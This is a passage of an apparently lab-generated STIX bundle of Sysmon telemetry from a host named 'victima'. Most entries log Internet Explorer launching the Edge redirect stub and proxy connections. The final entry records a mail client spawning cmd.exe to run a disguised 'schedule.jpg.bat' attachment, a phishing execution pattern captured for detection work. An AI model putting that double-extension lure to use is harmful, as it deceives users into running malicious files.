| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.391Z", | |
| "last_observed": "2022-07-27T14:26:14.391Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--19b72580-7453-4467-8d85-d632d0a331d1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.485Z", | |
| "modified": "2022-07-28T16:05:08.485Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:26.430828815Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:20.086Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50168, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:PNb3oxllKI+FLWrPIcyRckBDOnc=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:16.809Z", | |
| "last_observed": "2022-07-27T14:26:16.809Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--2c2440a4-9c55-4bda-8876-5bcbfcbbb4df", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.485Z", | |
| "modified": "2022-07-28T16:05:08.485Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 3868, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.666649222Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.226Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.076Z", | |
| "last_observed": "2022-07-27T14:26:24.076Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--89bb802a-2977-4bd1-886e-09cd5bde4a12", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.486Z", | |
| "modified": "2022-07-28T16:05:08.486Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:40.669424681Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:34.329Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50272, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:gV5pVkdEObnrnpeG+1bWsgyMfs4=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:31.617Z", | |
| "last_observed": "2022-07-27T14:26:31.617Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ab4a9161-168a-454d-ba7e-e9f926690f22", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.486Z", | |
| "modified": "2022-07-28T16:05:08.486Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:49.539523221Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:43.199Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50290, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:5AldHtxYVaAXrVC1IQpDgc8nWI4=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:41.301Z", | |
| "last_observed": "2022-07-27T14:26:41.301Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ba49654c-ea54-484a-9fc6-cba19fedf4b5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.486Z", | |
| "modified": "2022-07-28T16:05:08.486Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5380, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.013125779Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.667Z", | |
| "last_observed": "2022-07-27T14:26:45.667Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d51b4558-38fb-4fc5-ae78-1ab14eb13995", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.487Z", | |
| "modified": "2022-07-28T16:05:08.487Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:27:01.518720521Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:55.180Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:54.060Z", | |
| "last_observed": "2022-07-27T14:26:54.060Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--8894d9a7-3af2-43a5-86d3-09e66d716e1f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.487Z", | |
| "modified": "2022-07-28T16:05:08.487Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\WinMail\\WinMail.exe\" " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "6", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.625374764Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.230Z", | |
